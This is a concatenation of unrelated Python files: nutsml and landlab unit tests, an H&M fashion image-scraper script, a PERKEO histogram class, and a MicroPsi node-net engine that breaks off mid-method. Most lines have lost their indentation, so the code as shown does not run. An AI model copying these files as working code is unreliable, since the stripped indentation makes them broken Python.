import numpy as np
import collections as cl
import nutsml.datautil as util
from nutsflow.common import StableRandom
@pytest.fixture(scope="function")
def sampleset():
"""Return list with 50 positive and 10 negative samples"""
pos = [(0, i) for i in range(50)]
neg = [(1, i) for i in range(10)]
return pos + neg
def test_isnan():
assert not util.isnan(1)
assert not util.isnan(0)
    assert util.isnan(np.nan)  # np.NaN was removed in NumPy 2.0; np.nan works everywhere
def test_istensor():
assert util.istensor(np.zeros((2, 3)))
assert not util.istensor([1, 2])
def test_shapestr():
assert util.shapestr(np.array([1, 2])) == '2'
assert util.shapestr(np.zeros((3, 4))) == '3x4'
assert util.shapestr(np.zeros((3, 4), dtype='uint8'), True) == '3x4:uint8'
def test_stype():
a = np.zeros((3, 4), dtype='uint8')
b = np.zeros((1, 2), dtype='float32')
assert util.stype(1.1) == '<float> 1.1'
assert util.stype([1, 2]) == '[<int> 1, <int> 2]'
assert util.stype((1, 2)) == '(<int> 1, <int> 2)'
assert util.stype({1, 2}) == '{<int> 1, <int> 2}'
assert util.stype([1, (2, 3.1)]) == '[<int> 1, (<int> 2, <float> 3.1)]'
assert util.stype(a) == '<ndarray> 3x4:uint8'
assert util.stype(b) == '<ndarray> 1x2:float32'
expect = '[<ndarray> 3x4:uint8, [<ndarray> 1x2:float32]]'
assert util.stype([a, [b]]) == expect
expect = '[[<ndarray> 3x4:uint8], [<ndarray> 1x2:float32]]'
assert util.stype([[a], [b]]) == expect
expect = '{a:<ndarray> 3x4:uint8, b:<ndarray> 1x2:float32}'
assert util.stype({'a': a, 'b': b}) == expect
def test_batchstr():
a = np.zeros((3, 4), dtype='uint8')
b = np.zeros((1, 2, 2), dtype='float16')
assert util.batchstr([a]) == '[3x4:uint8]'
assert util.batchstr([a, b]) == '[3x4:uint8, 1x2x2:float16]'
assert util.batchstr([a, b], False) == '[3x4, 1x2x2]'
def test_random_upsample(sampleset):
samples = [('pos', 1), ('pos', 1), ('neg', 0)]
stratified = sorted(util.upsample(samples, 1, rand=StableRandom(0)))
assert stratified == [('neg', 0), ('neg', 0), ('pos', 1), ('pos', 1)]
stratified1 = util.upsample(sampleset, 0, rand=StableRandom(0))
_, labelcnts = util.group_samples(stratified1, 0)
assert labelcnts == {0: 50, 1: 50}
stratified2 = util.upsample(sampleset, 0, rand=StableRandom(1))
assert stratified1 != stratified2, 'Order should be random'
def test_random_downsample(sampleset):
samples = [('pos', 1), ('pos', 1), ('neg', 0)]
stratified = sorted(
util.random_downsample(samples, 1, rand=StableRandom(0)))
assert stratified == [('neg', 0), ('pos', 1)]
stratified1 = util.random_downsample(sampleset, 0, rand=StableRandom(0))
_, labelcnts = util.group_samples(stratified1, 0)
assert labelcnts == {0: 10, 1: 10}
stratified2 = util.random_downsample(sampleset, 0, rand=StableRandom(1))
assert stratified1 != stratified2, 'Order should be random'
def test_group_samples():
samples = [('pos', 1), ('pos', 1), ('neg', 0)]
groups, labelcnts = util.group_samples(samples, 1)
assert groups == {0: [('neg', 0)], 1: [('pos', 1), ('pos', 1)]}
assert labelcnts == cl.Counter({1: 2, 0: 1})
def test_group_by():
is_odd = lambda e: bool(e % 2)
numbers = [0, 1, 2, 3, 4]
assert util.group_by(numbers, is_odd) == {False: [0, 2, 4], True: [1, 3]}
assert util.group_by([1, 3], is_odd) == {True: [1, 3]}
assert util.group_by([], is_odd) == dict()
def test_col_map():
sample = (1, 2, 3)
add_n = lambda x, n: x + n
assert util.col_map(sample, 1, add_n, 10) == (1, 12, 3)
assert util.col_map(sample, (0, 2), add_n, 10) == (11, 2, 13)
def test_shuffle_sublists():
sublists = [[1, 2, 3], [4, 5, 6, 7]]
util.shuffle_sublists(sublists, StableRandom(0))
assert sublists == [[1, 3, 2], [4, 5, 7, 6]]
|
#! /usr/bin/env python
"""
Unit tests for landlab.collections
"""
import pytest
from landlab import Arena, Implements, ImplementsOrRaise, NoProvidersError, Palette
from landlab.framework.interfaces import BmiBase, BmiNoGrid
@Implements(BmiBase)
class Sample1(object):
"""A sample component."""
__implements__ = (BmiBase, BmiNoGrid)
_input_var_names = ["air__temperature", "surface__elevation"]
_output_var_names = ["deposition__rate"]
model_name = "Sample 1"
author_name = "Eric Hutton"
version = "0.1"
time_units = "s"
time_step_type = "fixed"
step_method = "explicit"
grid_type = "none"
_vars = {"deposition__rate": [1.]}
def initialize(self, name):
pass
def update(self):
pass
def finalize(self):
pass
def get_input_var_names(self):
return self._input_var_names
def get_output_var_names(self):
return self._output_var_names
def get_var_rank(self, name):
return 0
def get_start_time(self):
return 0.
def get_current_time(self):
return 0.
def get_end_time(self):
return 100.
def get_time_step(self):
return 1.
def get_var_type(self, name):
return "float64"
def get_var_units(self, name):
return "m"
def set_value(self, name, value):
pass
def get_value(self, name):
return self._vars[name]
@ImplementsOrRaise(BmiBase)
class Sample2(object):
"""A sample component."""
__implements__ = (BmiBase, BmiNoGrid)
_input_var_names = ["deposition__rate"]
_output_var_names = ["air__temperature", "surface__elevation"]
model_name = "Sample 2"
author_name = "Eric Hutton"
version = "0.1"
time_units = "s"
time_step_type = "fixed"
step_method = "explicit"
grid_type = "none"
_vars = {"air__temperature": [1.], "surface__elevation": [1.]}
def initialize(self, name):
pass
def update(self):
pass
def finalize(self):
pass
def get_input_var_names(self):
return self._input_var_names
def get_output_var_names(self):
return self._output_var_names
def get_var_rank(self, name):
return 0
def get_start_time(self):
return 0.
def get_current_time(self):
return 0.
def get_end_time(self):
return 100.
def get_time_step(self):
return 1.
def get_var_type(self, name):
return "float64"
def get_var_units(self, name):
return "m"
def get_value(self, name):
return self._vars[name]
def set_value(self, name, value):
pass
def test_empty_palette():
"""Create a palette without components."""
palette = Palette()
assert len(palette) == 0
assert list(palette.list()) == []
assert list(palette.keys()) == []
assert palette.uses() == []
assert palette.provides() == []
providers = palette.find_provider("air__temperature")
assert providers == []
users = palette.find_user("air__temperature")
assert users == []
connections = palette.find_connections()
assert connections == {}
def test_1_component_create():
palette = Palette(sample=Sample1)
assert len(palette) == 1
def test_1_component_dict_interface():
palette = Palette(sample=Sample1)
assert dict(sample=Sample1) == palette
assert len(palette) == 1
assert list(palette.keys()) == ["sample"]
assert list(palette.values()) == [Sample1]
items = list(palette.items())
assert ("sample", Sample1) == items[0]
def test_1_component_list():
palette = Palette(sample=Sample1)
assert ["sample"] == list(palette.list())
def test_1_component_uses():
palette = Palette(sample=Sample1)
uses = palette.uses()
uses.sort()
assert ["air__temperature", "surface__elevation"] == uses
def test_1_component_provides():
palette = Palette(sample=Sample1)
provides = palette.provides()
provides.sort()
assert ["deposition__rate"] == provides
def test_1_component_find_providers():
palette = Palette(sample=Sample1)
providers = palette.find_provider("air__temperature")
assert providers == []
providers = palette.find_provider("deposition__rate")
assert providers == ["sample"]
def test_1_component_find_users():
palette = Palette(sample=Sample1)
users = palette.find_user("air__temperature")
assert users == ["sample"]
def test_1_component_find_connections():
palette = Palette(sample=Sample1)
with pytest.raises(NoProvidersError):
palette.find_connections()
def test_2_components_create():
palette = Palette(one=Sample1, two=Sample2)
assert len(palette) == 2
def test_2_components_dict_interface():
palette = Palette(one=Sample1, two=Sample2)
assert dict(one=Sample1, two=Sample2) == palette
assert len(palette) == 2
keys = list(palette.keys())
keys.sort()
assert ["one", "two"] == keys
values = palette.values()
assert 2 == len(values)
assert Sample1 in values and Sample2 in values
items = list(palette.items())
items.sort()
assert 2 == len(items)
assert ("one", Sample1) == items[0]
assert ("two", Sample2) == items[1]
def test_2_components_list():
palette = Palette(one=Sample1, two=Sample2)
components = list(palette.list())
components.sort()
assert ["one", "two"] == components
def test_2_components_uses():
palette = Palette(one=Sample1, two=Sample2)
uses = palette.uses()
uses.sort()
assert ["air__temperature", "deposition__rate", "surface__elevation"] == uses
def test_2_components_provides():
palette = Palette(one=Sample1, two=Sample2)
provides = palette.provides()
provides.sort()
assert ["air__temperature", "deposition__rate", "surface__elevation"] == provides
def test_2_components_find_providers():
palette = Palette(one=Sample1, two=Sample2)
providers = palette.find_provider("air__temperature")
assert ["two"] == providers
providers = palette.find_provider("deposition__rate")
assert ["one"] == providers
def test_2_components_find_users():
palette = Palette(one=Sample1, two=Sample2)
users = palette.find_user("air__temperature")
assert ["one"] == users
def test_2_components_find_connections():
palette = Palette(one=Sample1, two=Sample2)
connections = {
"one": {"deposition__rate": ["two"]},
"two": {"air__temperature": ["one"], "surface__elevation": ["one"]},
}
assert connections == palette.find_connections()
def test_arena_instantiate():
arena = Arena()
assert dict() == arena
arena.instantiate(Sample1, "one")
assert 1 == len(arena)
assert "one" in arena
assert isinstance(arena["one"], Sample1)
arena.instantiate(Sample2, "two")
assert 2 == len(arena)
assert "one" in arena and "two" in arena
assert isinstance(arena["one"], Sample1)
assert isinstance(arena["two"], Sample2)
def test_arena_connect():
arena = Arena()
arena.instantiate(Sample1, "one")
arena.instantiate(Sample2, "two")
arena.connect("one", "two", "air__temperature")
arena.connect("one", "two", "surface__elevation")
arena.connect("two", "one", "deposition__rate")
arena["one"].get_value("deposition__rate")
arena["two"].get_value("air__temperature")
arena["two"].get_value("surface__elevation")
def test_arena_walk():
arena = Arena()
arena.instantiate(Sample1, "one")
arena.instantiate(Sample2, "two")
arena.connect("one", "two", "air__temperature")
arena.connect("one", "two", "surface__elevation")
arena.connect("two", "one", "deposition__rate")
tree = arena.walk("one")
assert ["one", "two"] == tree
|
__author__ = 'jie'
import sys
from initialization import initAppWithGui
def main(args):
app = initAppWithGui(args)
sys.exit(app.exec_())
if __name__ == '__main__':
main(sys.argv)
|
#== __init__.py ==#
from .main import GHClient
__title__ = 'GitHubAPI'
__author__ = 'sudosnok'
__version__ = '0.0.1'
|
from multiprocessing import freeze_support
from fashionscrapper.brand.asos.helper.database.dbhelper import list_dbs_by_category
from fashionscrapper.brand.hm.HM import HM
from fashionscrapper.brand.hm.consts.parser import *
from fashionscrapper.brand.hm.helper.download.HMPaths import HMPaths
from fashionscrapper.brand.hm.helper.download.HM_DownloadHelper import HM_DownloadHelper
from fashionscrapper.utils.web.dynamic import driver as d_driver
unknown_category_allowed=False
#def prepare_categories(category_jobs):
# def load_category(cat_data):
# category_name, category_url = cat_data
# with d_driver(headless=False) as driver:
# hm = HM(driver=driver, logger=logger)
# logger.debug("Loading" + category_url)
# items = hm.list_category(category_url, PAGINATE=PAGINATE)
# return [{"category": {"name": category_name, "url": category_url, "items": [x]}} for x in items]
# categories_data = []
# with Pool(THREADS) as p:
# r = p.map(load_category, tqdm(category_jobs, desc=f"i) List Cat. {THREADS} Threads", total=len(category_jobs)))
# categories_data.append(r)
# return flatten(categories_data)
def prepare_categories(dl_helper):
with d_driver(headless=False) as driver:
category_jobs_ = HM(driver=driver).list_categories_group_by_name()
assert len(category_jobs_) > 0
    exception_lists = dl_helper.prepare_categories(category_jobs_)
    # avoid shadowing the result list with the loop variable
    for exceptions in exception_lists:
        if len(exceptions) > 0:
            print(exceptions)
print("")
def prepare_articles(dl_helper):
categories_db_path = HMPaths(BASE_PATH).get_category_db_base_path()
categories_db = list_dbs_by_category(db_base_Path=categories_db_path, CATEGORIES=CATEGORIES,
unknown_category_allowed=unknown_category_allowed)
dl_helper.prepare_articles(categories_db)
def download_images(dl_helper):
entries_db_path = HMPaths(BASE_PATH).get_entries_db_base_path()
entries_db = list_dbs_by_category(db_base_Path=entries_db_path, CATEGORIES=CATEGORIES,
unknown_category_allowed=unknown_category_allowed)
exceptions = dl_helper.download_images(entries_db)
exceptions = list(filter(lambda x: x, exceptions))
for url, dst, exception in exceptions:
print(url, exception)
print("Len Excp", len(exceptions))
def describe_results(dl_helper):
results = dl_helper.describe_results()
for key, value in results.items():
print(key)
#print(max(len(key), len(value)) * "v")
print(value)
#print(max(len(key), len(value)) * "-")
print("-" * 16)
if __name__ == "__main__":
freeze_support()
dl_helper = HM_DownloadHelper(**dl_settings)
prepare_categories(dl_helper)
prepare_articles(dl_helper)
download_images(dl_helper)
describe_results(dl_helper)
|
""""""
from __future__ import annotations
import os
import matplotlib.pyplot as plt
import numpy as np
import pandas as pd
from matplotlib.pyplot import figure
from panter.data.dataMisc import ret_hist
output_path = os.getcwd()
plt.rcParams.update({"font.size": 12})
bfound_root = True
try:
from ROOT import TFile, TH1F
except ModuleNotFoundError:
bfound_root = False
class HistPerkeo:
"""Histogram object for use with PERKEO data.
Takes data and histogram parameters to create a histogram with
basic helper functions.
Parameters
----------
data : np.array
bin_count, low_lim, up_lim: int
Histogram parameters: Bin count, upper and lower limit
Attributes
----------
stats
parameters
see above section
hist : pd.DataFrame
Returned histogram from function ret_hist()
Examples
--------
Create a histogram with any np.array of data and plot the result:
>>> histogram = HistPerkeo(data=data_array, bin_count=10, low_lim=-10, up_lim=10)
>>> histogram.plot_hist()
"""
def __init__(
self,
        data: np.ndarray,
bin_count: int = 1024,
low_lim: int = 0,
up_lim: int = 52000,
):
assert low_lim <= up_lim, "Error: lower limit bigger than upper limit."
self._data = np.asarray(data)
if self._data.shape != ():
self.n_events = self._data.shape[0]
self.mean = self._data.mean()
self.stdv = self._data.std()
self.stats = {
"mean": self.mean,
"std": self.stdv,
"noevents": self.n_events,
}
self.parameters = {"bin_count": bin_count, "low_lim": low_lim, "up_lim": up_lim}
self.bin_count = bin_count
self.up_lim = up_lim
self.low_lim = low_lim
self.bin_width = (self.up_lim - self.low_lim) / self.bin_count
        if self._data.shape != ():
            self.hist = ret_hist(self._data, **self.parameters)
            self.integral = (self.hist["y"] * self.bin_width).sum()
        else:
            # scalar/empty input: no histogram (and hence no integral) can be built
            self.hist = None
            self.integral = None
def _calc_stats(self):
"""Calculate mean and biased variance of histogram based on bin content."""
self.n_events = self.hist["y"].sum()
self.mean = (self.hist["x"] * self.hist["y"]).sum() / self.n_events
var = ((self.hist["x"] - self.mean) ** 2 * self.hist["y"]).sum() / self.n_events
self.stdv = np.sqrt(var)
self.stats = {
"mean": self.mean,
"std": self.stdv,
"noevents": self.n_events,
}
self.integral = (self.hist["y"] * self.bin_width).sum()
def plot_hist(
self,
rng: list = None,
title: str = "",
xlabel: str = "",
ylabel: str = "",
bsavefig: bool = False,
filename: str = "",
):
"""Plot histogram."""
figure(figsize=(8, 6))
plt.errorbar(self.hist["x"], self.hist["y"], self.hist["err"], fmt=".")
if rng is not None:
plt.axis([rng[0], rng[1], rng[2], rng[3]])
if self.stats["std"] is None:
self.stats["std"] = 0.0
plt.title(title)
plt.ylabel(ylabel)
plt.xlabel(xlabel)
plt.annotate(
f"Mean = {self.stats['mean']:0.2f}\n" f"StDv = {self.stats['std']:0.2f}",
xy=(0.05, 0.95),
xycoords="axes fraction",
ha="left",
va="top",
bbox=dict(boxstyle="round", fc="1"),
)
if bsavefig:
if filename == "":
filename = "histperkeo"
plt.savefig(f"{output_path}/{filename}.png", dpi=300)
plt.show()
def addhist(self, hist_p: HistPerkeo, fac: float = 1.0):
"""Add another histogram to existing one with multiplicand."""
assert self.parameters == hist_p.parameters, "ERROR: Binning does not match."
newhist = pd.DataFrame(
{
"x": self.hist["x"],
"y": (self.hist["y"] + fac * hist_p.hist["y"]),
"err": np.sqrt(self.hist["err"] ** 2 + (fac * hist_p.hist["err"]) ** 2),
}
)
# Changes input ret_hist like in Root
self.hist = newhist
self._calc_stats()
def divbyhist(self, hist_p: HistPerkeo):
"""Divide by another histogram."""
assert self.parameters == hist_p.parameters, "ERROR: Binning does not match."
filt = hist_p.hist["y"] != 0.0
hist_p.hist = hist_p.hist[filt]
self.hist = self.hist[filt]
newhist = pd.DataFrame(
{
"x": self.hist["x"],
"y": (self.hist["y"] / hist_p.hist["y"]),
"err": np.sqrt(
(self.hist["err"] / hist_p.hist["y"]) ** 2
+ (self.hist["err"] * hist_p.hist["err"] / (hist_p.hist["y"] ** 2))
** 2
),
}
)
# Changes input ret_hist like in Root
self.hist = newhist
self._calc_stats()
def scal(self, fac: float):
"""Scale histogram by a factor."""
newhist = pd.DataFrame(
{
"x": self.hist["x"],
"y": (self.hist["y"] * fac),
"err": np.sqrt((fac * self.hist["err"]) ** 2),
}
)
# Changes input ret_hist like in Root
self.hist = newhist
self._calc_stats()
def ret_asnumpyhist(self):
"""Return histogram in np.histogram format from current histogram.
        Note: Cannot use the raw data, as it does not include added histograms etc."""
deltx = 0.5 * (self.hist["x"].values[1] - self.hist["x"].values[0])
binedge = self.hist["x"].values - deltx
binedge = np.append(binedge, self.hist["x"].values[-1] + deltx)
return self.hist["y"].values, binedge
def write2root(
self, histname: str, filename: str, out_dir: str = None, bupdate: bool = False
):
"""Write the histogram into a root file."""
assert bfound_root, "ERROR: Could not find ROOT package."
if out_dir is None:
out_dir = output_path
opt = "UPDATE" if bupdate else "RECREATE"
hfile = TFile(f"{out_dir}/{filename}.root", opt, "Panter Output")
rhist = TH1F(
f"{histname}",
f"{histname}",
self.parameters["bin_count"],
self.parameters["low_lim"],
self.parameters["up_lim"],
)
        for i in range(1, rhist.GetNbinsX() + 1):  # ROOT bin indices run from 1 to nbins inclusive
rhist.SetBinContent(i, self.hist["y"][i - 1])
rhist.SetBinError(i, self.hist["err"][i - 1])
rhist.Draw()
hfile.Write()
return 0
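# Editor sketch (synthetic data, not from the original module):
#
#     h1 = HistPerkeo(np.random.normal(26000., 2000., 10000))
#     h2 = HistPerkeo(np.random.normal(26000., 2000., 10000))
#     h1.addhist(h2, fac=-1.0)   # subtract h2 from h1 bin by bin
#     h1.plot_hist(title="difference", xlabel="channel", ylabel="counts")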
|
__author__ = 'rvuine'
import json
import os
from micropsi_core.tools import post_mortem
from micropsi_core.nodenet import monitor
from micropsi_core.nodenet.node import Nodetype
from micropsi_core.nodenet.nodenet import Nodenet, NODENET_VERSION
from micropsi_core.nodenet.stepoperators import DoernerianEmotionalModulators
from .dict_stepoperators import DictPropagate, DictCalculate
from .dict_node import DictNode
from .dict_nodespace import DictNodespace
import copy
STANDARD_NODETYPES = {
"Comment": {
"name": "Comment",
"symbol": "#",
'parameters': ['comment'],
"shape": "Rectangle"
},
"Neuron": {
"name": "Neuron",
"slottypes": ["gen"],
"nodefunction_name": "neuron",
"gatetypes": ["gen"]
},
"Sensor": {
"name": "Sensor",
"parameters": ["datasource"],
"nodefunction_name": "sensor",
"gatetypes": ["gen"]
},
"Actuator": {
"name": "Actuator",
"parameters": ["datatarget"],
"nodefunction_name": "actuator",
"slottypes": ["gen"],
"gatetypes": ["gen"]
},
"Concept": {
"name": "Concept",
"slottypes": ["gen"],
"nodefunction_name": "concept",
"gatetypes": ["gen", "por", "ret", "sub", "sur", "cat", "exp", "sym", "ref"]
},
"Script": {
"name": "Script",
"slottypes": ["gen", "por", "ret", "sub", "sur"],
"nodefunction_name": "script",
"gatetypes": ["gen", "por", "ret", "sub", "sur", "cat", "exp", "sym", "ref"]
},
"Pipe": {
"name": "Pipe",
"slottypes": ["gen", "por", "ret", "sub", "sur", "cat", "exp"],
"nodefunction_name": "pipe",
"gatetypes": ["gen", "por", "ret", "sub", "sur", "cat", "exp"],
"parameters": ["expectation", "wait"],
"symbol": "πp",
"shape": "Rectangle",
"parameter_defaults": {
"expectation": 1,
"wait": 10
}
},
"Activator": {
"name": "Activator",
"slottypes": ["gen"],
"parameters": ["type"],
"parameter_values": {"type": ["por", "ret", "sub", "sur", "cat", "exp", "sym", "ref", "sampling"]},
"nodefunction_name": "activator"
},
"LSTM": {
"name": "LSTM",
"slottypes": ["gen", "por", "gin", "gou", "gfg"],
"gatetypes": ["gen", "por", "gin", "gou", "gfg"],
"nodefunction_name": "lstm",
}
}
class DictNodenet(Nodenet):
"""Main data structure for MicroPsi agents,
Contains the net entities and runs the activation spreading. The nodenet stores persistent data.
Attributes:
state: a dict of persistent nodenet data; everything stored within the state can be stored and exported
uid: a unique identifier for the node net
name: an optional name for the node net
nodespaces: a dictionary of node space UIDs and respective node spaces
nodes: a dictionary of node UIDs and respective nodes
links: a dictionary of link UIDs and respective links
gate_types: a dictionary of gate type names and the individual types of gates
slot_types: a dictionary of slot type names and the individual types of slots
node_types: a dictionary of node type names and node type definitions
world: an environment for the node net
worldadapter: an actual world adapter object residing in a world implementation, provides interface
owner: an id of the user who created the node net
step: the current calculation step of the node net
"""
@property
def engine(self):
return "dict_engine"
@property
def current_step(self):
return self._step
@property
def worldadapter_instance(self):
return self._worldadapter_instance
@worldadapter_instance.setter
def worldadapter_instance(self, _worldadapter_instance):
self._worldadapter_instance = _worldadapter_instance
if self._worldadapter_instance:
for uid, node in self._nodes.items():
# re-set parameters to filter for available datasources/-targets
if node.type == "Sensor":
node.set_parameter('datasource', node.get_parameter('datasource'))
if node.type == "Actuator":
node.set_parameter('datatarget', node.get_parameter('datatarget'))
self._worldadapter_instance.nodenet = self
def __init__(self, persistency_path, name="", worldadapter="Default", world=None, owner="", uid=None, native_modules={}, use_modulators=True, worldadapter_instance=None, version=None):
"""Create a new MicroPsi agent.
Arguments:
agent_type (optional): the interface of this agent to its environment
name (optional): the name of the agent
owner (optional): the user that created this agent
uid (optional): unique handle of the agent; if none is given, it will be generated
"""
super().__init__(persistency_path, name, worldadapter, world, owner, uid, native_modules=native_modules, use_modulators=use_modulators, worldadapter_instance=worldadapter_instance, version=version)
try:
import numpy
self.numpy_available = True
except ImportError:
self.numpy_available = False
self.nodetypes = {}
for type, data in STANDARD_NODETYPES.items():
self.nodetypes[type] = Nodetype(nodenet=self, **data)
self._nodes = {}
self._nodespaces = {}
self._last_assigned_node_id = 0
self.nodegroups = {}
self.initialize_nodenet({})
def initialize_stepoperators(self):
self.stepoperators = [DictPropagate(), DictCalculate()]
if self.use_modulators:
self.stepoperators.append(DoernerianEmotionalModulators())
self.stepoperators.sort(key=lambda op: op.priority)
def get_data(self, **params):
data = super().get_data(**params)
data['nodes'] = self.construct_nodes_dict(**params)
data['nodespaces'] = self.construct_nodespaces_dict("Root", transitive=True)
data['modulators'] = self.construct_modulators_dict()
data['last_assigned_node_id'] = self._last_assigned_node_id
return data
def export_json(self):
data = self.get_data(complete=True, include_links=False)
data['links'] = self.construct_links_list()
return data
def get_links_for_nodes(self, node_uids):
source_nodes = [self.get_node(uid) for uid in node_uids]
links = {}
nodes = {}
for node in source_nodes:
nodelinks = node.get_associated_links()
for l in nodelinks:
links[l.signature] = l.get_data(complete=True)
if l.source_node.parent_nodespace != node.parent_nodespace:
nodes[l.source_node.uid] = l.source_node.get_data(include_links=False)
if l.target_node.parent_nodespace != node.parent_nodespace:
nodes[l.target_node.uid] = l.target_node.get_data(include_links=False)
return list(links.values()), nodes
def get_nodes(self, nodespace_uids=[], include_links=True, links_to_nodespaces=[]):
"""
Returns a dict with contents for the given nodespaces
"""
data = {}
data['nodes'] = {}
data['nodespaces'] = {}
followupnodes = []
fetch_all = False
if nodespace_uids == []:
nodespace_uids = self.get_nodespace_uids()
root = self.get_nodespace(None)
data['nodespaces'][root.uid] = root.get_data()
fetch_all = True
else:
nodespace_uids = [self.get_nodespace(uid).uid for uid in nodespace_uids]
for nodespace_uid in nodespace_uids:
data['nodespaces'].update(self.construct_nodespaces_dict(nodespace_uid))
nodespace = self.get_nodespace(nodespace_uid)
for uid in nodespace.get_known_ids(entitytype="nodes"):
node = self.get_node(uid)
data['nodes'][uid] = node.get_data(include_links=include_links)
if include_links and not fetch_all:
followupnodes.extend(node.get_associated_node_uids())
if include_links:
for uid in set(followupnodes):
if uid not in data['nodes']:
node = self.get_node(uid).get_data(include_links=True)
for gate in list(node['links'].keys()):
                    links = node['links'][gate]
                    # rebuild the list instead of deleting while enumerating, which would skip entries
                    node['links'][gate] = [l for l in links
                                           if self._nodes[l['target_node_uid']].parent_nodespace in nodespace_uids]
                    if len(node['links'][gate]) == 0:
                        del node['links'][gate]
data['nodes'][uid] = node
return data
def save(self, base_path=None, zipfile=None):
if base_path is None:
base_path = self.persistency_path
data = json.dumps(self.export_json(), indent=4)
if self.numpy_available:
import io
import numpy as np
# write numpy states of native modules
numpy_states = self.construct_native_modules_numpy_state_dict()
for node_uid, states in numpy_states.items():
if len(states) > 0:
filename = "%s_numpystate.npz" % node_uid
if zipfile:
stream = io.BytesIO()
np.savez(stream, **states)
stream.seek(0)
zipfile.writestr(filename, stream.getvalue())
else:
np.savez(os.path.join(base_path, filename), **states)
if zipfile:
zipfile.writestr('nodenet.json', data)
else:
filename = os.path.join(base_path, 'nodenet.json')
# dict_engine saves everything to json, just dump the json export
with open(filename, 'w+', encoding="utf-8") as fp:
fp.write(data)
if os.path.getsize(filename) < 100:
# kind of hacky, but we don't really know what was going on
raise RuntimeError("Error writing nodenet file")
def load(self):
"""Load the node net from a file"""
# try to access file
if self._version != NODENET_VERSION:
self.logger.error("Wrong version of nodenet data in nodenet %s, cannot load." % self.uid)
return False
filename = os.path.join(self.persistency_path, 'nodenet.json')
with self.netlock:
initfrom = {}
if os.path.isfile(filename):
try:
self.logger.info("Loading nodenet %s from file %s", self.name, filename)
with open(filename, encoding="utf-8") as file:
initfrom.update(json.load(file))
except ValueError:
self.logger.warning("Could not read nodenet data")
return False
except IOError:
self.logger.warning("Could not open nodenet file")
return False
self.initialize_nodenet(initfrom)
if self.numpy_available:
import numpy as np
# recover numpy states for native modules
for uid in self._nodes:
if self._nodes[uid].type in self.native_modules:
file = os.path.join(self.persistency_path, '%s_numpystate.npz' % uid)
if os.path.isfile(file):
node = self.get_node(uid)
numpy_states = np.load(file)
node.set_persistable_state(node._state, numpy_states)
numpy_states.close()
return True
def _load_nodetypes(self, nodetype_data):
newnative_modules = {}
for key, data in nodetype_data.items():
if data.get('engine', self.engine) == self.engine:
try:
if data.get('dimensionality'):
raise NotImplementedError("dict nodenet does not support highdimensional native modules")
else:
newnative_modules[key] = Nodetype(nodenet=self, **data)
except Exception as err:
self.logger.error("Can not instantiate node type %s: %s: %s" % (key, err.__class__.__name__, str(err)))
post_mortem()
return newnative_modules
def reload_native_modules(self, native_modules):
""" reloads the native-module definition, and their nodefunctions
and afterwards reinstantiates the nodenet."""
self.native_modules = self._load_nodetypes(native_modules)
self.native_module_definitions = dict((uid, native_modules[uid]) for uid in self.native_modules)
saved = self.export_json()
self.clear()
self.merge_data(saved, keep_uids=True)
def initialize_nodespace(self, id, data):
if id not in self._nodespaces:
# move up the nodespace tree until we find an existing parent or hit root
while id != 'Root' and data[id].get('parent_nodespace') not in self._nodespaces:
self.initialize_nodespace(data[id]['parent_nodespace'], data)
self._nodespaces[id] = DictNodespace(self,
data[id].get('parent_nodespace'),
name=data[id].get('name', 'Root'),
uid=id,
index=data[id].get('index'))
def initialize_nodenet(self, initfrom):
"""Called after reading new nodenet state.
Parses the nodenet state and set up the non-persistent data structures necessary for efficient
computation of the node net
"""
self._modulators.update(initfrom.get("modulators", {}))
if initfrom.get('runner_condition'):
self.set_runner_condition(initfrom['runner_condition'])
self._nodespace_ui_properties = initfrom.get('nodespace_ui_properties', {})
# set up nodespaces; make sure that parent nodespaces exist before children are initialized
self._nodespaces = {}
self._nodespaces["Root"] = DictNodespace(self, None, name="Root", uid="Root")
if 'current_step' in initfrom:
self._step = initfrom['current_step']
if 'last_assigned_node_id' in initfrom:
self._last_assigned_node_id = initfrom['last_assigned_node_id']
if len(initfrom) != 0:
# now merge in all init data (from the persisted file typically)
self.merge_data(initfrom, keep_uids=True)
def generate_uid(self, entitytype=None):
self._last_assigned_node_id += 1
return "n%d" % self._last_assigned_node_id
def construct_links_list(self):
data = []
for node_uid in self.get_node_uids():
node = self.get_node(node_uid)
for g in node.get_gate_types():
data.extend([l.get_data(complete=True) for l in node.get_gate(g).get_links()])
return data
def construct_nodes_dict(self, **params):
data = {}
for node_uid in self.get_node_uids():
data[node_uid] = self.get_node(node_uid).get_data(**params)
return data
def construct_native_modules_numpy_state_dict(self):
numpy_states = {}
if self.numpy_available:
for uid in self._nodes:
numpy_state = self._nodes[uid].get_persistable_state()[1]
if numpy_state:
numpy_states[uid] = numpy_state
return numpy_states
def construct_nodespaces_dict(self, nodespace_uid, transitive=False):
data = {}
if nodespace_uid is None:
nodespace_uid = "Root"
if transitive:
for nodespace_candidate_uid in self.get_nodespace_uids():
is_in_hierarchy = False
if nodespace_candidate_uid == nodespace_uid:
is_in_hierarchy = True
else:
parent_uid = self.get_nodespace(nodespace_candidate_uid).parent_nodespace
while parent_uid is not None and parent_uid != nodespace_uid:
parent_uid = self.get_nodespace(parent_uid).parent_nodespace
if parent_uid == nodespace_uid:
is_in_hierarchy = True
if is_in_hierarchy:
data[nodespace_candidate_uid] = self.get_nodespace(nodespace_candidate_uid).get_data()
else:
for uid in self.get_nodespace(nodespace_uid).get_known_ids('nodespaces'):
data[uid] = self.get_nodespace(uid).get_data()
return data
    def get_nodetype(self, type):
        """ Returns the nodetype instance for the given nodetype or native_module, or None if not found"""
        if type in self.nodetypes:
            return self.nodetypes[type]
        else:
            return self.native_modules.get(type)
def get_activation_data(self, nodespace_uids=None, rounded=1):
activations = {}
node_ids = []
        if not nodespace_uids:
node_ids = self._nodes.keys()
else:
for nsuid in nodespace_uids:
node_ids.extend(self.get_nodespace(nsuid).get_known_ids("nodes"))
for uid in node_ids:
node = self.get_node(uid)
if rounded is None:
act = [node.get_gate(gate_name).activation for gate_name in node.get_gate_types()]
if set(act) != {0}:
activations[uid] = act
else:
act = [round(node.get_gate(gate_name).activation, rounded) for gate_name in node.get_gate_types()]
if set(act) != {0}:
activations[uid] = act
return activations
def delete_node(self, node_uid):
if node_uid in self._nodespaces:
affected_entity_ids = self._nodespaces[node_uid].get_known_ids()
for uid in affected_entity_ids:
self.delete_node(uid)
parent_nodespace = self._nodespaces.get(self._nodespaces[node_uid].parent_nodespace)
if parent_nodespace and parent_nodespace.is_entity_known_as('nodespaces', node_uid):
parent_nodespace._unregister_entity('nodespaces', node_uid)
parent_nodespace.contents_last_changed = self.current_step
del self._nodespaces[node_uid]
self._track_deletion('nodespaces', node_uid)
else:
